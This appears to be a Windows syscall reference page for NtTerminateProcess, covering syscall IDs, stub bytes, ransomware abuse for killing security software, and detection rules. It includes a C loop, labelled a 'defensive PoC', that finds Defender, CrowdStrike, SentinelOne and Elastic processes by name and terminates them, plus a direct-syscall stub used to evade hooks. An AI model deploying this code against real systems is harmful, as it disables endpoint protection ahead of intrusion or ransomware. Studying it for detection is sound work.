ntoskrnl.exeT1562.001T1489T1106

NtTerminateProcess

Terminates a target process and all of its threads with a given exit status.

Prototype

NTSTATUS NtTerminateProcess(
  HANDLE   ProcessHandle,
  NTSTATUS ExitStatus
);

Arguments

Name	Type	Dir	Description
ProcessHandle	HANDLE	in	Handle to the process to terminate. Requires PROCESS_TERMINATE. NULL means "terminate every thread of the current process except the caller".
ExitStatus	NTSTATUS	in	Exit code reported by GetExitCodeProcess and recorded in the process object.

Syscall IDs by Windows version

Windows version	Syscall ID	Build
Win10 1507	0x2C	win10-1507
Win10 1607	0x2C	win10-1607
Win10 1703	0x2C	win10-1703
Win10 1709	0x2C	win10-1709
Win10 1803	0x2C	win10-1803
Win10 1809	0x2C	win10-1809
Win10 1903	0x2C	win10-1903
Win10 1909	0x2C	win10-1909
Win10 2004	0x2C	win10-2004
Win10 20H2	0x2C	win10-20h2
Win10 21H1	0x2C	win10-21h1
Win10 21H2	0x2C	win10-21h2
Win10 22H2	0x2C	win10-22h2
Win11 21H2	0x2C	win11-21h2
Win11 22H2	0x2C	win11-22h2
Win11 23H2	0x2C	win11-23h2
Win11 24H2	0x2C	win11-24h2
Server 2016	0x2C	winserver-2016
Server 2019	0x2C	winserver-2019
Server 2022	0x2C	winserver-2022
Server 2025	0x2C	winserver-2025

Kernel module

ntoskrnl.exe → NtTerminateProcess

Related APIs

TerminateProcessExitProcessNtTerminateThreadNtSuspendProcessNtOpenProcess

Syscall stub

4C 8B D1            mov r10, rcx
B8 2C 00 00 00      mov eax, 0x2C
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Undocumented notes

NtTerminateProcess holds SSN `0x2C` across every Windows 10 / 11 / Server build. It is the kernel implementation behind TerminateProcess / ExitProcess and is also called implicitly by the C runtime's `_exit` and by SEH unhandled-exception finalizers. Calling it with ProcessHandle == NULL is a documented shortcut to kill every thread in the current process besides the caller — the second half of `ExitProcess`'s teardown.

Common malware usage

The defining abuse is **EDR / AV killing** (T1562.001). Modern ransomware (Conti, LockBit, BlackCat/ALPHV, Royal, Akira) and post-exploitation frameworks routinely pair a vulnerable driver BYOVD (zemana, gmer, RTCore64) with a userland binary that walks the process list, matches against a hardcoded EDR-name allowlist (MsMpEng, Sense, CSFalconService, elastic-agent, ...) and either drops to kernel to invoke ZwTerminateProcess directly, or — once the EDR's protection callback has been stripped — calls NtTerminateProcess from userland with PROCESS_TERMINATE. Other uses: aborting an injected helper process after lateral-movement payload delivery, and self-destructing droppers after second-stage handoff.

Conti LockBit BlackCat/ALPHV Royal Akira Cobalt Strike

Detection opportunities

PsSetCreateProcessNotifyRoutineEx callbacks fire on process exit with `Create` == FALSE and include both terminator and victim PIDs; this is the gold telemetry. Sysmon Event ID 5 (`ProcessTerminate`) is much lighter and lacks the terminator field. ETW `Microsoft-Windows-Kernel-Process/ProcessStop` provides the same data. A high-fidelity rule: any non-System, non-csrss process terminating a process whose image path lives under `Program Files\Windows Defender`, `Program Files\Microsoft\Windows Defender Advanced Threat Protection`, `Program Files\CrowdStrike`, `Program Files\SentinelOne`, or similar EDR roots. Pair with EDR self-protection telemetry (PPL violation attempts on Defender's `MsMpEng.exe`).

Direct syscall examples

asmx64 direct stub

; Direct syscall stub for NtTerminateProcess (SSN 0x2C, all builds)
NtTerminateProcess PROC
    mov  r10, rcx          ; syscall convention
    mov  eax, 2Ch          ; SSN
    syscall
    ret
NtTerminateProcess ENDP

cEDR kill loop (defensive PoC)

// Defensive PoC: enumerate processes, match against an EDR allowlist,
// and call NtTerminateProcess directly. Assumes prerequisites (token theft
// to SYSTEM, EDR protection callback already stripped via BYOVD) are met.
#include <windows.h>
#include <tlhelp32.h>
#include <wchar.h>

typedef NTSTATUS (NTAPI *pNtTerminateProcess)(HANDLE, NTSTATUS);

static const wchar_t *kTargets[] = {
    L"MsMpEng.exe", L"MsSense.exe", L"CSFalconService.exe",
    L"elastic-agent.exe", L"SentinelAgent.exe", NULL,
};

void KillEDRs(void) {
    pNtTerminateProcess NtTerminateProcess = (pNtTerminateProcess)GetProcAddress(
        GetModuleHandleA("ntdll.dll"), "NtTerminateProcess");

    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32W pe = { sizeof pe };
    for (BOOL ok = Process32FirstW(snap, &pe); ok; ok = Process32NextW(snap, &pe)) {
        for (size_t i = 0; kTargets[i]; ++i) {
            if (_wcsicmp(pe.szExeFile, kTargets[i]) == 0) {
                HANDLE h = OpenProcess(PROCESS_TERMINATE, FALSE, pe.th32ProcessID);
                if (h) { NtTerminateProcess(h, 0); CloseHandle(h); }
            }
        }
    }
    CloseHandle(snap);
}

rustself-destruct on completion

// Cargo: windows-sys = "0.59" (Win32_System_Threading, Win32_Foundation)
use windows_sys::Win32::Foundation::HANDLE;
use windows_sys::Win32::System::Threading::GetCurrentProcess;

extern "system" {
    fn NtTerminateProcess(ProcessHandle: HANDLE, ExitStatus: i32) -> i32;
}

pub fn self_destruct(code: i32) -> ! {
    unsafe { NtTerminateProcess(GetCurrentProcess(), code); }
    loop {}
}

MITRE ATT&CK mappings

Last verified: 2026-05-20